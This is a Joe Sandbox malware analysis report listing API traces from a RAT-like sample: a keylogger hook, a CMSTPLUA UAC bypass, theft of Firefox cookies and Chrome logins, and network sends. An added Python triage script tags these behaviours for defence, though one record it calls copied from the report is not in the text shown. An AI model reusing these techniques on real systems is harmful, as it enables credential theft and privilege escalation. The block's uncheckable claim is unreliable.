                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0$1$2$3$4$5$6$7$VG
                          • API String ID: 0-1861860590
                          • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                          • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C37D
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C3AD
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C41F
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C42C
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C402
                          • GetLastError.KERNEL32(?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C44D
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C463
                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C46A
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C473
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                          • String ID: `.|
                          • API String ID: 2341273852-3844220425
                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                          APIs
                          • _wcslen.LIBCMT ref: 0040755C
                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Object_wcslen
                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                          • API String ID: 240030777-3166923314
                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                          APIs
                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                          • GetLastError.KERNEL32 ref: 0041A84C
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                          • String ID:
                          • API String ID: 3587775597-0
                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID: JD$JD$JD
                          • API String ID: 745075371-3517165026
                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 1164774033-405221262
                          • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                          • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Find$CreateFirstNext
                          • String ID: 8SG$PXG$PXG$NG$PG
                          • API String ID: 341183262-3812160132
                          • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                          • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                          • GetLastError.KERNEL32 ref: 0040A328
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetMessageA.USER32 ref: 0040A376
                          • TranslateMessage.USER32(?), ref: 0040A385
                          • DispatchMessageA.USER32(?), ref: 0040A390
                          Strings
                          • Keylogger initialization failure: error , xrefs: 0040A33C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                          • String ID: Keylogger initialization failure: error
                          • API String ID: 3219506041-952744263
                          • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                          • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                          • String ID:
                          • API String ID: 1888522110-0
                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                          APIs
                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCloseCreateLibraryLoadProcsend
                          • String ID: SHDeleteKeyW$Shlwapi.dll
                          • API String ID: 2127411465-314212984
                          • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                          • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                          APIs
                          • _free.LIBCMT ref: 00449292
                          • _free.LIBCMT ref: 004492B6
                          • _free.LIBCMT ref: 0044943D
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                          • _free.LIBCMT ref: 00449609
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                          APIs
                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                          • String ID: !D@$PowrProf.dll$SetSuspendState
                          • API String ID: 1589313981-2876530381
                          • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                          • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                          • GetLastError.KERNEL32 ref: 0040BA93
                          Strings
                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                          • UserProfile, xrefs: 0040BA59
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • API String ID: 2018770650-1062637481
                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                          APIs
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                          • GetLastError.KERNEL32 ref: 004179D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          • API String ID: 3534403312-3733053543
                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
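The function records above list the raw hex arguments the sandbox recovered from the stack, which is where the useful facts hide: the SetWindowsHookExA call at 0040A31C passes hook id 0x0D (WH_KEYBOARD_LL, the low-level keyboard hook behind the "Keylogger initialization failure" string), the CreateToolhelp32Snapshot call at 0040F4F4 passes 0x2 (TH32CS_SNAPPROCESS) and its OpenProcess subcall asks for 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) while walking processes for the ieinstal.exe / ielowutil.exe injection targets, the CoGetObject call at 004075BD is paired with the "Elevation:Administrator!new:" prefix and the CMSTPLUA CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} (the elevation-moniker UAC bypass; the "ucmAllocateElevatedObject" string is the function name used for it in the UACMe project), and the DeleteFileA call at 0040BA89 wipes Chrome's "Login Data" store. The following Python script is an added triage helper, not code from the report or from Joe Sandbox: it parses records of exactly this shape, decodes the constants from the public Win32 headers (that mapping is my assumption, the report does not state it), and tags the behaviours. The sample records embedded in it are copied from the report's own lines; everything else (the tag names, the decoder tables, the `triage` helper) is mine.

```python
"""Added triage helper for the per-function API records of a Joe Sandbox report.

Not code from the report or from Joe Sandbox: it parses "Func.MODULE(args), ref: ADDR"
lines and the "String ID:" line of a record, decodes the constant arguments a Win32
developer would recognise (values from the public headers), and tags the behaviour the
function implements. The sample records at the bottom are copied from the report.
"""
import re

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Win32 constants from the public headers; anything not listed stays raw hex.
HOOK_IDS = {2: "WH_KEYBOARD", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
TH32_FLAGS = {0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
PROCESS_ACCESS = {0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

def _flags(table):
    """Bitmask decoder: names every set bit, or None when a bit is not in the table."""
    def decode(value):
        known = [name for bit, name in table.items() if value & bit]
        return "|".join(known) if known and sum(b for b in table if value & b) == value else None
    return decode

# (API name without its A/W suffix, argument index) -> decoder
DECODERS = {("SetWindowsHookEx", 0): HOOK_IDS.get,
            ("CreateToolhelp32Snapshot", 0): _flags(TH32_FLAGS),
            ("OpenProcess", 0): _flags(PROCESS_ACCESS)}

def _base(func):
    """SetWindowsHookExA / SetWindowsHookExW -> SetWindowsHookEx."""
    return func[:-1] if len(func) > 2 and func[-1] in "AW" and func[-2].islower() else func

def parse_record(text):
    """Return (calls, strings); each call is a dict with func, args, ref and decoded args."""
    calls, strings = [], []
    for line in text.splitlines():
        if m := API_LINE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            call = {"func": m["func"], "args": args, "ref": m["ref"], "decoded": {}}
            for idx, arg in enumerate(args):
                decoder = DECODERS.get((_base(call["func"]), idx))
                if decoder and re.fullmatch(r"[0-9A-Fa-f]{8}", arg) and (name := decoder(int(arg, 16))):
                    call["decoded"][idx] = name
            calls.append(call)
        elif m := STRING_LINE.match(line):
            strings.extend(s for s in m["ids"].split("$") if s)
    return calls, strings

def tag_behaviours(calls, strings):
    """Behaviour tags derived from the API set, decoded constants and referenced strings."""
    funcs = {_base(c["func"]) for c in calls}
    consts = {name for c in calls for name in c["decoded"].values()}
    text = " ".join(strings)
    tags = []
    if "SetWindowsHookEx" in funcs and "WH_KEYBOARD_LL" in consts:
        tags.append("low-level keyboard hook (keylogger)")
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= funcs:
        tags.append("process enumeration")
    if "CoGetObject" in funcs and "Elevation:Administrator!new:" in text:
        tags.append("COM elevation moniker (CMSTPLUA UAC bypass)")
    if "DeleteFile" in funcs and ("Login Data" in text or "cookies.sqlite" in text):
        tags.append("browser credential/cookie store wiping")
    return tags

# Records copied from the report (constructed test input for this example).
SAMPLE_RECORDS = {
    "keylogger": r"""
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
• String ID: Keylogger initialization failure: error
""",
    "process_enum": r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.|$ieinstal.exe$ielowutil.exe
""",
    "uac_bypass": r"""
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• String ID: $$Elevation:Administrator!new:$[+] ucmAllocateElevatedObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
""",
    "chrome": r"""
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• String ID: [Chrome StoredLogins found, cleared!]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
""",
}

def triage(records=SAMPLE_RECORDS):
    """Map record name -> ({'Func[argidx]': constant name}, behaviour tags)."""
    out = {}
    for name, text in records.items():
        calls, strings = parse_record(text)
        consts = {f"{c['func']}[{i}]": n for c in calls for i, n in c["decoded"].items()}
        out[name] = (consts, tag_behaviours(calls, strings))
    return out
```

Paste further records from the report into `SAMPLE_RECORDS` (or read them from the saved HTML) to tag the rest of the functions; extend `DECODERS` only with constants you have checked against the headers, since a wrong decode is worse than raw hex. The bitmask decoder deliberately returns None when any bit is outside its table, so an unexpected access mask is surfaced as raw hex rather than silently mislabelled.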
                          APIs
                          • __EH_prolog.LIBCMT ref: 00409293
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                          • FindClose.KERNEL32(00000000), ref: 004093FC
                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                          • FindClose.KERNEL32(00000000), ref: 004095F4
                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                          • String ID:
                          • API String ID: 1824512719-0
                          • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                          • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
